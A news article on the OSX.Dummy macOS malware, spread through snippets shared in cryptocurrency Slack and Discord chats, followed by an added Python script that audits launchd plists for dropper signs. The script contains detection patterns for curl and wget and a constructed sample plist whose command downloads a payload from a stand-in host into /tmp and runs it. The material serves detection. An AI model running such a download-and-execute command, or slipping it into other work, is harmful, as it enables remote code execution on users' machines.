Security researchers have discovered new malware targeting Mac owners discussing cryptocurrencies on Slack and Discord chat websites.

According to security researcher Remco Verhoef, multiple macOS malware attacks originating in cryptocurrency-related Slack and Discord chats have been observed. The attackers infiltrate these groups posing as administrators or other key people in the community.

In a SANS Institute blog post, Verhoef said that small snippets are being shared in the chats which, when run, download and execute a malicious binary. Once installed, the binary attempts to connect to a command-and-control (C&C) server owned by the attackers. If the connection to the C&C server succeeds, the attackers can remotely access the Mac and run code on it.

The malware also steals the user's password and stores it on the local machine.

“CrownCloud, a German-based provider is the owner of the block of 185.243.115.230 and the server appears to be located in the Netherlands,” said Verhoef.

According to a blog post by another researcher, Patrick Wardle, chief research officer and founder of Digita Security, the infection method of the malware, which he has named OSX.Dummy, is “dumb”.

“Apparently attackers are asking users to infect themselves,” he said. He also lambasted the size of the malware, which comes in at 34MB, and called the persistence mechanism “lame”, as it simply places a launch daemon in the LaunchDaemons directory.
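Both the delivery described above (a shared snippet that downloads and executes a binary) and the LaunchDaemons persistence Wardle calls “lame” leave artifacts a defender can check for. The Python script below is an added example, not code from the SANS post, from Wardle's write-up or from the malware itself: it parses launchd job property lists and flags any job whose command line points at a user-writable directory, fetches something from the network, or hands an inline script to an interpreter. The sample plists, the label com.hypothetical.dropper and the URL example.invalid are constructed for the example; scan_directory() can be pointed at a real /Library/LaunchDaemons.

```python
"""Audit launchd job plists for the signals that make a chat-delivered,
download-and-execute dropper persisting as a LaunchDaemon easy to spot."""

import os
import plistlib
import re
from typing import Dict, List, Tuple

# Paths a non-root user or a throwaway script can write to. A *system* daemon
# (LaunchDaemons, not LaunchAgents) referencing one of these is rarely legitimate.
USER_WRITABLE = re.compile(r"(?<![\w/])(?:/private)?/(?:tmp|var/tmp|var/folders|Users)/")

# Download-and-execute idioms: a fetch tool or a URL on the job's command line.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b|https?://", re.IGNORECASE)

# Interpreters a dropper typically hands its payload to.
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}


def audit_launch_job(name: str, plist: Dict) -> List[str]:
    """Return human-readable findings for one parsed launchd job ([] if it looks benign)."""
    findings: List[str] = []
    argv: List[str] = []
    if "Program" in plist:
        argv.append(str(plist["Program"]))
    argv.extend(str(a) for a in plist.get("ProgramArguments", []))

    if not argv:
        return [f"{name}: job declares no Program or ProgramArguments"]

    exe = argv[0]
    if not exe.startswith("/"):
        findings.append(f"{name}: executable {exe!r} is not an absolute path")

    for arg in argv:
        if USER_WRITABLE.search(arg):
            findings.append(f"{name}: references user-writable path in {arg!r}")
        if DOWNLOAD_EXEC.search(arg):
            findings.append(f"{name}: command line downloads from the network: {arg!r}")

    # "sh -c '...'" hides the real payload from a casual look at the plist.
    if os.path.basename(exe) in INTERPRETERS and "-c" in argv[1:]:
        findings.append(f"{name}: interpreter {exe!r} runs an inline script")

    # Only worth calling out once something else is already suspicious.
    if findings and (plist.get("RunAtLoad") or plist.get("KeepAlive")):
        findings.append(f"{name}: job is RunAtLoad/KeepAlive, so it re-launches at boot")
    return findings


def audit_plist_bytes(name: str, data: bytes) -> List[str]:
    """Parse raw plist bytes (XML or binary) and audit the job."""
    return audit_launch_job(name, plistlib.loads(data))


def scan_directory(directory: str = "/Library/LaunchDaemons") -> Dict[str, List[str]]:
    """Audit every .plist in a launchd directory on a real Mac; returns {filename: findings}."""
    results: Dict[str, List[str]] = {}
    if not os.path.isdir(directory):
        return results
    for fname in sorted(os.listdir(directory)):
        if not fname.endswith(".plist"):
            continue
        path = os.path.join(directory, fname)
        try:
            with open(path, "rb") as fh:
                plist = plistlib.load(fh)
        except (OSError, plistlib.InvalidFileException) as exc:
            results[fname] = [f"{fname}: unreadable ({exc})"]
            continue
        results[fname] = audit_launch_job(fname, plist)
    return results


# Constructed sample jobs (not artifacts of the real malware). The second mimics
# the shape of a chat-delivered dropper: a system daemon that re-runs a script
# fetched into /tmp at every boot.
SAMPLE_PLISTS: List[Tuple[str, bytes]] = [
    ("com.example.legit.plist", b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.legit</string>
  <key>ProgramArguments</key><array><string>/usr/libexec/legitd</string><string>--daemon</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""),
    ("com.hypothetical.dropper.plist", b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.hypothetical.dropper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s http://example.invalid/payload -o /tmp/payload &amp;&amp; python /tmp/payload</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""),
]

if __name__ == "__main__":
    for name, data in SAMPLE_PLISTS:
        for line in audit_plist_bytes(name, data) or [f"{name}: no findings"]:
            print(line)
    for findings in scan_directory().values():
        for line in findings:
            print(line)
```

Run as root on a Mac to audit the real directory. The rules are heuristics: a clean result does not prove the machine is uninfected (a daemon that launches a binary from a normal system location would pass), and a hit is a prompt to inspect the referenced file, not a verdict.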

“The capabilities are rather limited (and thus rather dumb), it’s trivial to detect at every step (that dumb)…and finally, the malware saves the user’s password to dumpdummy.”

“I guess the take away here is (yet again) the built-in macOS malware mitigations should never be viewed as a panacea.”

This article originally appeared at scmagazineuk.com